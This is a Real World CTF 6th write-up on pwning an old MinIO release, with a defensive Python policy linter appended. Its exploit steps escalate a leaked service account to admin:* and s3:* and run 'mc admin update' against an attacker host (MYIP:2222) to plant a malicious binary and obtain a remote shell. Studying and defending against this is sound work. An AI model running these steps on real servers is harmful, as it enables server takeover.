Real-world-ctf-6th-minioday-writeup

I recently attended REAL WORLD CTF 6th.

I placed 24th out of 2291 teams. I’m happy that I was able to solve the web chal which only 11 teams solved.

scoreboard (tairo, my alias)

holy tough challenges
extreme challenges, I like

Challenge


Old CVEs, try pwn it for fun.

Analysis

The attached file contains a Dockerfile, a data directory and run.sh, which contains the following lines.

#!/bin/bash
docker build -t minio/minio:RELEASE.2023-03-13T19-46-17Z.fips-rwctf .
docker run -e MINIO_UPDATE_MINISIGN_PUBKEY= -e MINIO_ROOT_USER=rwctf -e MINIO_ROOT_PASSWORD=rwctf123_for_player -d -p 9000:9000 -p 9090:9090 minio/minio:RELEASE.2023-03-13T19-46-17Z.fips-rwctf server /data --console-address ':9090'

I didn’t know anything about MinIO (https://min.io/); it seems to be an S3 API implementation built around a command/query style, with an enterprise-oriented management console.

I started by going through the release notes and the details of CVEs affecting version RELEASE.2023-03-13T19-46-17Z.

Privilege Escalation on Linux/MacOS · Advisory · minio/minio · GitHub

An attacker can use crafted requests to bypass metadata bucket name checking and put an object into any bucket while processing PostPolicyBucket. To carry out this attack, the attacker requires credentials with arn:aws:s3:::* permission, as well as enabled Console API access.

Does it fit this situation? I looked into it, but the forest of routing logic couldn’t answer my question immediately. After spending some hours, I found an interesting advisory referring to a similar privilege escalation.

Denial of access by an admin privileged user for root credential · Advisory · minio/minio · GitHub – This fix landed in this version, but… similar notes still appear in newer releases. This is an important point for getting the flag.

Rabbit Holes

I found well-detailed exploit information. It is very helpful and works perfectly in the local environment. We know the rwctf password, MINIO_ROOT_PASSWORD=rwctf123_for_player. Even if this password were changed, the /minio/bootstrap/v1/verify approach can reveal all environment variables.

However, the rwctf user’s password had been changed on the remote machine, and the /minio/bootstrap endpoint was restricted by something like an ACL system.
I retried WAF bypass payloads many times and googled for more critical information about this point. All that monkey work was wasted. I got stuck.

Flag

In the end, a service-account dump (with a session that never expires) placed in data/, and some reports about missing checks in the IAM logic, helped me.

credential dumps in the replica files

The manual (https://min.io/docs/minio/linux/reference/minio-mc.html) of the official client (mc) was also very useful. However, the service account (Vmd6q3aw2eOEmZ6l) does not have the permission to update binaries that the evil_minio technique requires. So I tried the privilege escalation mentioned in the advisory. It went well!

exploit steps

  1. mc alias set test http://xxx:yyy # yyy is forwarded to the console port
  2. mc admin user svcacct edit test Vmd6q3aw2eOEmZ6l --policy ./policy.json # wrote the following JSON
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": [
                "admin:*"
            ]
        },
        {
            "Effect": "Allow",
            "Action": [
                "kms:*"
            ]
        },
        {
            "Effect": "Allow",
            "Action": [
                "s3:*"
            ],
            "Resource": [
                "arn:aws:s3:::*"
            ]
        }
    ]
}

acquiring arn:aws:s3:::* and admin:*


policy granted

  3. mc admin update test http://MYIP:2222/minio.RELEASE.2023-03-22T06-36-24Z.sha256sum -y # this line is explained in detail here.

  4. Got a remote shell and the FLAG!!!


pwned
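The policy.json above is what made the escalation possible: a wildcard admin grant plus s3:* over every bucket. As an added illustration (not part of the original write-up and not MinIO’s own tooling), the following lints a MinIO IAM-style policy document and reports Allow statements whose Action pattern covers an escalation-capable action. The action names are MinIO’s admin and S3 action identifiers; the two probe bucket ARNs and the scoped contrast policy are constructed.

```python
"""Lint a MinIO IAM-style policy for grants that let a service account
escalate (admin wildcard, server update, writes to every bucket)."""
import fnmatch
import json

# Concrete actions treated as escalation-capable; the admin:* and s3:*
# wildcards in the write-up's policy.json cover every one of them.
SENSITIVE_ACTIONS = ("admin:ServerUpdate",          # mc admin update
                     "admin:UpdateServiceAccount",  # mc admin user svcacct edit
                     "s3:PutObject", "s3:DeleteBucket")
# Two constructed bucket ARNs; a Resource pattern matching both is treated
# as "every bucket", like arn:aws:s3:::* in the write-up.
PROBE_BUCKETS = ("arn:aws:s3:::alpha/x", "arn:aws:s3:::beta")

# The write-up's policy.json (kms statement omitted) and a scoped contrast.
WRITEUP_POLICY = json.dumps({"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Action": ["admin:*"]},
    {"Effect": "Allow", "Action": ["s3:*"], "Resource": ["arn:aws:s3:::*"]}]})
SCOPED_POLICY = json.dumps({"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Action": ["s3:GetObject", "s3:PutObject"],
     "Resource": ["arn:aws:s3:::uploads/*"]}]})


def _as_list(value):
    """Policy fields may be a single string or a list of strings."""
    if value is None:
        return []
    return [value] if isinstance(value, str) else list(value)


def covers_all_buckets(resources):
    """True when some Resource pattern matches both probe bucket ARNs."""
    return any(all(fnmatch.fnmatchcase(p, r) for p in PROBE_BUCKETS)
               for r in resources)


def find_overbroad_grants(policy_json):
    """Return (statement index, sensitive action, resources) for each Allow
    whose Action covers that action; s3 hits also need an all-bucket Resource."""
    findings = []
    for idx, stmt in enumerate(json.loads(policy_json).get("Statement", [])):
        if stmt.get("Effect") != "Allow":
            continue
        resources = _as_list(stmt.get("Resource")) or ["*"]  # absent means any
        for pattern in _as_list(stmt.get("Action")):
            for action in SENSITIVE_ACTIONS:
                if not fnmatch.fnmatchcase(action, pattern):
                    continue
                if action.startswith("s3:") and not covers_all_buckets(resources):
                    continue
                findings.append((idx, action, ",".join(resources)))
    return findings
```

Running it over WRITEUP_POLICY reports all four sensitive actions; the scoped policy, which limits s3:PutObject to one bucket prefix, reports nothing.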

Outro

Looking back from this write-up, this challenge is not so hard, but I solved it in the last few hours (my submission was the 11th, the last one). I felt that the mass of code and the limited time (this is one of the easiest challenges in this CTF) raised the bar. Fortunately, luck smiled on me and I was able to get out of the rabbit hole.

But I’m a little disappointed, because I think I could have solved ChatterBox if I had had more time and hadn’t gotten stuck…

douro

Software Developer, Security Researcher


2024-01-29